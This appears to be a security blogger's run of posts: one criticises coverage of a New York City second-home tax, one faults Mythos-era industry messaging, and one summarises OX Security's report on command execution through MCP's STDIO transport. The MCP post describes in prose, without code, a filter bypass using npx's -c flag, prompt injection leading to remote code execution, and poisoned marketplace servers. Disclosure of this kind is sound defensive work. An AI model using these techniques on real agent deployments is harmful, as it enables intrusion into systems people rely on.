A mayor and a governor propose a tax. I swear this is real, not a joke. The tax applies to homes in New York City worth more than five million dollars that are not the owner’s primary residence. The owner’s primary residence is somewhere else. That is the legal definition of a second home, and that is the condition for owing the tax.

The projected revenue is five hundred million dollars. The projected city deficit is five point four billion. The owners who owe the tax are, by the tax’s own definition, people who live elsewhere. Palm Beach. Aspen. London. Riyadh. The apartment stays mostly vacant or holds a partial-year occupancy for a few weeks. The tax exists because the apartment is held for someone who lives somewhere else.

A federal politician who is a billionaire calls this destruction of a city.

A Washington outlet prints the word destruction in its headline and supplies the billionaire’s quotes underneath. A finance outlet publishes a companion piece the next morning in which unnamed Wall Streeters say the city is cooked. Neither piece prints the revenue figure against the deficit figure. Neither piece explains that the taxed party is by definition a non-resident. Neither piece mentions Vancouver, Paris, or London, which have run versions of this tax for years and still stand, arguably among the most desirable cities.

Consider what the reader of these outlets now knows instead. The reader knows a particular Trump feeling. The reader knows a verb. The reader does not know the arithmetic. The arithmetic, if printed, would answer the feeling. Five hundred million dollars from a few thousand absentee owners, against a budget gap that otherwise falls on eight million residents. The tax either produces the revenue or moves the apartment to an occupant. The buildings remain where they are in either case. The land cannot be relocated.

So the arithmetic exists, and the outlets did not print it. This was a choice. Print the arithmetic and the story collapses, because destruction requires a mechanism and the mechanism cannot be produced. Omit it and the Trump supplied verb survives. The verb obviously was what the president wanted reported. The outlets reported the verb.

This is an old disinformation trick.

In the 1920s the Ku Klux Klan operated two national papers, the Fiery Cross out of Indianapolis and the Imperial Night-Hawk out of Atlanta, which printed populist slogans against plutocrats while the Klan coalition pursued Prohibition and opposed progressive taxation at the state level.

Prohibition, the Klan-Protestant-nativist coalition’s product, was a racist platform to remove the liquor excise that had supplied part of the municipal tax base. Klan driven opposition to income tax prevented any replacement. The hole was filled by raising property taxes and sales taxes. Property tax landed on farmers. Sales tax landed on wage workers. The rhetoric named Wall Street. The real cost arrived elsewhere.

The cost from tax opposition, by design, arrived most heavily at Black Americans.

Black landowning farmers in the 1920s South paid the same property tax rates as white farmers, on land they had fought to acquire and held under constant threat. The revenue those taxes raised funded segregated white schools. Black schools received token allocations or nothing. Oklahoma, Indiana, and the Deep South ran this pattern. The property tax hikes extracted capital from Black landowners through statute, sometimes to the point of forced sale.

Black wage workers paid the sales taxes that replaced the liquor excises. A domestic worker in Indianapolis paid the same sales tax rate on flour as the banker’s wife. The banker’s household paid no state income tax. The Klan coalition had opposed its introduction. The domestic worker’s grocery bill subsidized roads the wealthy drove on.

Where statute could not reach, the extraction ran through violence. Tulsa 1921 is the version everyone knew in 1921 and today, with a very suspicious silence in-between. Black Wall Street’s accumulated wealth transferred by firebomb and mass murder in a single night. Rosewood followed in 1923. The tax program and the racial violence were not separate patterns. They were the same extraction moving through different instruments. Violence where the statute would have drawn federal attention. Statute where the violence would have drawn it. The Klan coalition ran both.

The rhetoric pointed at Wall Street. The instruments landed on Black farmers, Black wage workers, and Black communities that had accumulated visible wealth. A contradiction covered in white sheets, with X logos and swastikas.

The Fiery Cross and the Imperial Night-Hawk printed the rhetoric and omitted the instruments. Mainstream Indiana and Oklahoma papers could transcribe Klan rallies as news and extend the effect. One paper chose differently, to report the truth. The Indianapolis Times under Boyd Gurley obtained D. C. Stephenson’s bribery ledger in 1927, printed the names of the officials on the Klan payroll, and won the 1928 Pulitzer for public service. The prize measured a specific editorial distance. The distance between printing what a powerful white supremacist said, and printing what his program did.

That distance is the core subject of this post.

Father Coughlin, speaking to tens of millions on radio in the 1930s, told his audience to drive the money changers from the temple while opposing every legislative proposal that would have taxed the money changers. Huey Long, in Louisiana, proposed actual taxation of actual wealth, and was shot in the state capitol. The pattern holds. Anti-plutocrat performance on the surface. Pro-plutocrat policy underneath. The revenue gap closed by taxing the people the performance claims to represent.

The Trump post attacks a tax. Blocking the second-home tax leaves five hundred million dollars with absentee owners and pushes the gap onto residents through service cuts or regressive taxes. The costume of populism wrapped around a donor-class outcome, exactly as Coughlin wrapped it, exactly as the Fiery Cross wrapped it.

The outlet that prints the verb without the arithmetic is doing the same work the Fiery Cross did. It is not neutral it is a megaphone, wind in the sails.

Neutrality would require the arithmetic. The arithmetic would end the story. The editorial choice to omit it is the mechanism by which the performance becomes news.

The Hill’s piece, by Sarah Davis, published on April 16. Business Insider’s piece, by Katherine Tangalakis-Lippert, published the next morning. Both bylines, both editors, and both business models sit on the wrong side of the distance Boyd Gurley crossed in 1927 to pull the white sheets off. Whether they cross it is a choice available to them today. Someone should investigate why they have not.

A couple decades ago I made a late night drinking bet about SANS with a colleague outside the security industry. Would I be able to inject myself easily to the cover of every brochure?

He owed me a beer within a month.

What did I do? I wrote a gross, obviously over-glowing, completely saccharine, review of a SANS course into a feedback form. It was something like this training was better than sliced bread. Everyone MUST do this NOW or be a FAILURE at security. Boom, my name went to the top of every brochure (back then they were paper as well as online). I contributed heavily to a SANS Linux security hardening guide by 1999 and reviewed a lot of what was coming in, so I was no stranger to a lack of filtering on inputs and outputs.

As much as I enjoyed my frothy beer of victory, in a way it backfired. My friend was disgusted. He also was disgusted when I popped root on another colleague’s laptop to prove that he shouldn’t be running portmap on insecure networks. Ah, the good old days.

It turned out to be unsettling to know SANS lacked filtering on hyped nonsense. I wanted to be wrong. And then came the recognition I didn’t expect. Soon many strangers in the industry were greeting me with “oh, I know the name Davi, you’re the guy on the cover of SANS”. Uh, oops. The difference between intelligence and literature is a known problem in security marketing.

SANS was rushing into print the parts that serve their seats and subscription alarm, and not the parts that complicated it.

Fast forward to today’s Mythos discourse.

Anthropic is feeding one very dubious premise: the asymmetry between attacker and defender is permanent. Ok, that’s nonsense. And yet, Rob Lee at SANS just told Forbes he does not see it changing for a year, maybe longer. Kara Sprague at HackerOne said the same. Gordon Goldstein’s CFR piece pulls in Lucas Nelson at Lytical Ventures (on whose advisory board Goldstein serves) to say this is the defining cybersecurity challenge of the next decade.

“It’s not like Mythos was unique, it’s just faster,” Rob Lee, chief AI officer and chief of research at SANS Institute, told me via video interview. “There’s been a concerted effort of finding zero days over the past year using all of the existing models. So what that basically means [sic] that there were thousands of zero days that have been discovered that have been queued up to patch. This basically takes it from moving at 50 miles an hour to about breaking the sound barrier in terms of speed.”

The premise is simply false. And evidence it is false has been sitting on CISA’s website since at least 2023.

And just because I like history, let me point out up front the excited Mythos briefing that names Jen Easterly as a contributing author (hi Jen!) does not cite the federal guidance issued while she ran CISA.

Defenders Only Have to Be Right Once

Grab Mythos. Point it at your own code. Do not ask which bugs it can find. Ask a completely different question.

If I rewrote this C service in Go, would the exploit chain you just produced still run. If I moved this Java handler to Rust, would the deserialization primitive survive. If I took the 27-year-old system you found a bug in and ported its network-facing code to a memory-safe language, how many of the thousands of zero days you claim to have found would remain.

It’s like when crossbows showed up to battle as a low-skill accelerant. In theory a French King could hire a bunch of Italian mercenaries and their bolt-firing machines, and wipe out highly-specialized and rare knights challenging bad monarchy. In reality, Genoese crossbowmen lost their pavises in the baggage train, fought in rain that slackened their bowstrings, were outranged by longbows, and were then ridden down by their own French cavalry for withdrawing. The theory failed under adverse conditions and the people operating the new machines were murdered by their own leader.

The answers to a defense forward approach are known.

Microsoft has reported for over a decade that roughly 70 percent of the vulnerabilities it assigns a CVE are memory safety issues. Google reports the same proportion for Chromium. Microsoft’s November 2025 Secure Future Initiative report confirms the number has not moved. The class is not a long tail. It is a spine to the exploitable vulnerability population.

In June 2025 CISA and the NSA published joint guidance calling memory-safe languages the most comprehensive mitigation against this class and describing the shift as a paradigm change from detection after the fact to prevention at the language level. CISA’s Product Security Bad Practices document pushed manufacturers to publish memory safety roadmaps by the end of 2025.

The Mythos announcement could have been THAT acceleration topic and we’d be in a whole different media circus right now. The White House Office of the National Cyber Director has been on this trajectory since the Back to the Building Blocks report.

None of this is speculative. The rapid improvement map is sitting on federal websites, waiting for someone to execute it at Mythos speed. I have given talks about this for a decade already, rooted in the lessons of automatic weapons that led into trench warfare and tanks of WWI. Faster patching is the wrong goal. Eliminating the class is the right one.

Microsoft Research has published on using LLMs to port C code to memory-safe dialects. Microsoft’s Surface line now ships Rust-based UEFI firmware. AWS runs Rust at scale. Chromium is on the memory-safety path. The Linux kernel accepts Rust contributions. The technical path exists, the guidance exists, and the tooling exists.

If Mythos is the supersonic technology that Rob Lee claims, a defender strapping it on does not just speed up the patch cycles. A defender eliminates the class.

Supersonic Inversion

The chorus frames AI-augmented discovery as a flood that attackers will ride faster than defenders can bail. This may be an entirely wrong geometry, based on people thinking about horseshoes in the era of bicycles.

An attacker has to find one real bug in one real service and exploit it before the defender detects or patches. A defender armed with the same capability is not obligated to play that game. And the industrialized profit model of Mythos makes it entirely vulnerable to a simple economic exploit well known to drone warfare logistics.

The defender can generate ten thousand plausible endpoints where one real service sits. Each endpoint responds like a real system. File structure plausible, command history coherent, protocol behavior consistent under inspection. Microsoft Defender XDR already auto-generates decoys from environment naming conventions. Tracebit ships LLM-generated canaries. Research published in late 2025 documents generative AI deception operating at machine pace, with attacker dwell time and intelligence yield well above traditional honeypots.

Now run the incredibly over-priced Mythos’s supposed capability against that attack surface. The attacker’s AI agent cannot tell which of ten thousand endpoints is the real service. Every exploit burned on a decoy is intelligence for the defender and a cost to the attacker. Zero days are expensive. Spending them on chaff is fatal when your model costs a lot of Jacksons per million tokens instead of a dime.

AI Sweden’s research frame is the sharpest: cybersecurity is fundamentally a problem of asymmetry, and deception’s purpose is to make attacker effort prohibitively expensive by forcing adversaries to burn zero days in controlled environments. At Mythos speed, the defender generates chaff so much faster than the attacker can possibly triage any real targets.

The obvious asymmetry game inverts, and yet I’ve seen exactly nobody talking about this.

Drunk Chorus is Off Key

The SANS 30-page briefing’s Priority Action 1 is to point agents at your code. That headline is what SANS has been promoting. The briefing itself is more honest than the promotion. Priority Action 8 includes a paragraph on AI-assisted software minimization and replacing third-party libraries with framework primitives. Priority Action 9 is titled “Build a Deception Capability” and runs three sentences on canaries and honey tokens. Both exist in the document. Neither appears in Rob Lee’s Substack summary, which names Priority Actions 1, 6, and 11 by number and skips 8 and 9 entirely. The sections most aligned with the defender path are in the briefing. They are not in the marketing.

I found a complete absence of memory-safe languages. Zero mentions across 30 pages. No Rust. No Go. No memory-safe. No memory safety. No Back to the Building Blocks. No ONCD. No reference to the CISA and NSA joint guidance that has named memory-safe languages the most comprehensive mitigation since 2023. Jen Easterly gave us federal guidance while she ran CISA, yet it is not cited in the briefing with her name on it that claims to respond to the moment that guidance was built for.

The omission is annoying particularly because of the industry economics.

SANS sells training against persistent threats. HackerOne sells bug-bounty infrastructure that requires bugs to continue existing. Palo Alto Networks sells defensive AI priced against a permanently adversarial environment. CFR sells policy access predicated on the crisis remaining unresolved. Anthropic sells a consortium seat. VulnOps, Priority Action 11 in the SANS briefing, is a permanent staffed operational function designed to run continuously.

None, not a single one, of these products monetize in a world where the attack surface has been architecturally eliminated, or where deception has made offensive AI economically unviable. The defender path threatens the business model. The chorus defaults to the answer that preserves its revenue.

Where the briefing does cover deception, it covers it as a 2015 technique. Canaries and honey tokens. Static lures. What the briefing leaves out is the inversion Mythos-class AI unlocks for defenders: LLM-generated endpoints at machine pace, plausible under inspection, forcing the attacker to burn zero days on chaff. Tracebit ships this. Microsoft Defender XDR ships this. Late-2025 research documents the dwell-time and intelligence yield. The briefing treats deception like telling people it’s still 2006, completely missing a 2026 Mythos-enabled version.

CISA’s memory safety push, the NSA’s guidance, and the ONCD’s Back to the Building Blocks report all point at the same answer. The exploitable surface can be reduced by a majority through language choice. Refactoring cost collapses when AI does the port. The surviving surface can be drowned in chaff. The combination, at AI speed, collapses the attacker advantage the chorus is marketing as permanent. Five years of federal guidance. Zero mentions in the briefing that claims to respond to the moment the guidance anticipates.

I can’t stop shaking my fist at my screen.

Integrity Test Elephant in the Room

A security expert worth the title, handed a Mythos-class capability, would publish the first systematic refactoring of memory-unsafe components at scale, with before-and-after exploitability measurements. The work would support CISA’s 2025 roadmap deadline and demonstrate the defender path concretely. It would ship in a GitHub repository, not a press release.

A security expert selling a subscription to the alarm would avoid publishing anything that makes the alarm shorter.

The defender path exists. The guidance exists. The tools exist. The question is which experts are running the defender path and which ones are running the press tour to a “Mythos” world of FUD.

As the old protest song goes, congressional-industrial-military-complex, what is it good for…

OX Security published a report today that lands directly in the growing storm about Anthropic’s risk management practices. To put it bluntly, a systemic vulnerability sits at the core of Anthropic’s Model Context Protocol (MCP).

The finding is simple. MCP’s STDIO transport accepts arbitrary command strings and passes them directly to subprocess execution.

Yup.

No validation.
No sanitization.
No sandboxing.

It gets worse. The command runs even when the MCP server fails to start. The process executes first, then the MCP handshake tries to validate it as a legitimate server, then the handshake fails, then the error gets caught. But the payload already ran. Execute first, validate second. Fire, ready, aim fails any threat model.

Every developer who builds on Anthropic’s MCP inherits the exposure because it is found across all ten official MCP language SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust.

OX POC Numbers

The OX Research team report shows they executed commands on six production platforms of paying customers. They took over thousands of public servers spanning more than 200 popular open-source GitHub projects. They uploaded a proof-of-concept malicious MCP server to 9 of 11 major MCP marketplaces.

Not a single marketplace caught it.

The case studies are where it gets really interesting.

• LangFlow: 915 publicly accessible instances on Shodan, unauthenticated session tokens, full server takeover and data exfiltration without ever logging in.
• Letta AI: authenticated users could substitute a valid STDIO payload via man-in-the-middle, achieving arbitrary command execution on production servers.
• Windsurf: prompt injection to local RCE with zero clicks, assigned CVE-2026-30615.
• Flowise: the most important case. Flowise actually did what Anthropic says developers should do. They implemented input filtering. Specific commands only. Special characters stripped. And then? OX bypassed it in a single step using npx’s -c flag. When the architecture permits arbitrary subprocess execution, application-layer filtering is a wet paper bag. The “developer responsibility” defense just lost a whole lot of trust.

The obvious objection to LangFlow is that 915 instances of a tool designed for local deployment ended up on the public internet, and that’s a configuration failure not a protocol failure. Ok, fine. That is why the Flowise case is up there too. Flowise did the right thing. They implemented filtering in the intended local context. It didn’t work. The design flaw defeated the shift of responsibility.

We can apply this generally to the world of MCP and think in big, big terms. Anthropic’s MCP Python SDK alone accounts for 73 million downloads. The third-party projects that depend on it push the aggregate higher: 57 million for LiteLLM, 22 million for FastMCP. Over 32,000 dependent repositories. Not all of those are Anthropic’s code, but all of them inherit Anthropic’s architectural decision.

OX confirmed 7,374 public servers vulnerable on Shodan, of more than 200,000 estimated exposed. That’s a meaningful number for a company gathering headlines about a $100 million vulnpocalypse in OTHER people’s software.

Anthropic Response

OX contacted Anthropic on January 7, 2026 and got this statement:

This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default.

LangChain’s response:

It is the responsibility of the application author to validate and sanitize inputs from untrusted sources.

FastMCP’s response:

We don’t consider this a vulnerability. stdio transport spawns a subprocess by design, per the MCP specification.

Google’s Gemini-CLI:

Known issue, no CVE, no fix planned near-term.

Cursor:

By design. User must click accept on mcp.json edit.

Clearly, when five independent organizations float the same answer, threat modeling is not experiencing deep or diverse thought. I’m having flashbacks to the old Telnet is everywhere days. Apparently MCP comes with an industry-wide expectation for architectural insecurity to float away onto someone else.

At least we can see that, after OX’s initial report, Anthropic quietly updated its SECURITY.md to recommend that MCP adapters and specifically STDIO ones “should be used with caution.”

A documentation change. Not a code change. The vulnerability is there for you to step on like a land mine under a treadmill. The responsibility is not where it should be. The question is why.

Contrast to Glasswing

Anthropic just launched Project Glasswing, a $100 million cybersecurity initiative using its unreleased Mythos model to find zero-day vulnerabilities in everyone else’s software. AWS, Apple, Google, Microsoft, and CrowdStrike are officially participating and promoting their participation.

Anthropic is positioning itself as the entity that will secure the software ecosystem. Why would you trust a company to find vulnerabilities in your code when it classifies arbitrary command execution in its own protocol as expected behavior?

The conflict is not that Glasswing exists while MCP is insecure. The conflict is that Glasswing’s value proposition requires exactly the kind of belt-and-suspenders “secure by default” thinking that Anthropic refuses to apply at all with MCP. Can they really sell everyone on the standard they refuse to meet?

OX proposed four specific fixes that would have propagated protection instantly to every downstream library and project:

1. Manifest-only execution to replace arbitrary command strings
2. Command allowlisting to block high-risk binaries by default
3. A mandatory dangerous-mode opt-in flag for any STDIO configuration using dynamic arguments
4. Marketplace verification standards requiring security manifests signed by verified developer identity

Anthropic declined all four. The company is spending $100 million to find other people’s decades-old bugs with Mythos. Fixing the architectural flaw in its own protocol from 2024 apparently does not qualify.

OX calls Anthropic’s approach “Fault-Diversion”: pushing the burden of complex security sanitization onto downstream developers. Their framing is generous. This ain’t my first rodeo, so I recognize this pattern. A company understands the problem. Has the resources to fix it. Receives concrete proposed solutions. Declines all of them. Updates a document. Then shifts responsibility to implementers. Which obscures who created it.

Lay My Body to Rest On the Hill of Secure by Default

The proposed remediation list from OX reads like a requirements document for Wirken, the secure agent gateway I built to address exactly this class of problem. CISOs often know “this is not how things should be done”, but they lack a pivot. They really need help pointing at something that proves it can be done differently.

Attack Surface	MCP default	MCP behind Wirken
Command execution	Arbitrary strings passed to subprocess, no filtering	Docker/gVisor/Wasm sandbox, graduated permissions, shell exec requires approval, approvals expire after 30 days by default
Audit trail	None	Append-only hash-chained log, SHA-256 tamper detection, SIEM forwarding to Datadog/Splunk/webhook in real time
Identity verification	No identity or signing in the STDIO transport specification	Each channel runs as isolated process with its own Ed25519 identity over Unix domain sockets via Cap’n Proto
Credential storage	Exposed (primary exfiltration target in OX findings)	Encrypted at rest with XChaCha20-Poly1305, keyed from OS keychain

Secure-by-default agent execution is NOT aspirational. It should be the baseline. That’s why I open-sourced it so anyone can pull and play with it. When a CISO asks “what ships today” for MCP security, it’s right there. Single static binary. The architectural choices OX is asking Anthropic to make are choices that already have been made available via Wirken.

Credit to OX for doing the work and setting the record straight. Their full report is available here: The Mother of All AI Supply Chains.